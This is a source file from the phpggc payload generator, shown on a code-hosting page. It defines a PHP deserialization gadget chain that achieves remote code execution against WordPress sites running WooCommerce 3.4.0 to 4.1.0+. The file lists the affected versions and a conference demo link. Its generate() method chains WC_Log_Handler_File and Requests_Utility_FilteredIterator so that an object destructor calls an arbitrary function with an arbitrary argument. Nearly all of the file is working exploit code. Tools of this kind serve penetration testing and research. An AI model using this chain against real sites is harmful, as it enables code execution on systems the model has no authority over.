Codebase list phpggc / a3a16673-36a5-4247-9f99-064889ca5f61/upstream/0.20221129 gadgetchains / WordPress / P / WooCommerce / RCE / 1 / chain.php
a3a16673-36a5-4247-9f99-064889ca5f61/upstream/0.20221129

Tree @a3a16673-36a5-4247-9f99-064889ca5f61/upstream/0.20221129 (Download .tar.gz)

chain.php @a3a16673-36a5-4247-9f99-064889ca5f61/upstream/0.20221129raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php

namespace GadgetChain\WordPress\P\WooCommerce;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '3.4.0 <= 4.1.0+ & WP < 5.5.2';
    public static $vector = '__destruct';
    public static $author = 'erwan_lr';
    public static $information = '
        Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763
        Tested up to WP 5.4.1 and WooCommerce 4.1.0 activated (but not configured). Newest versions might also work.
    ';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \WC_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function));
    }
}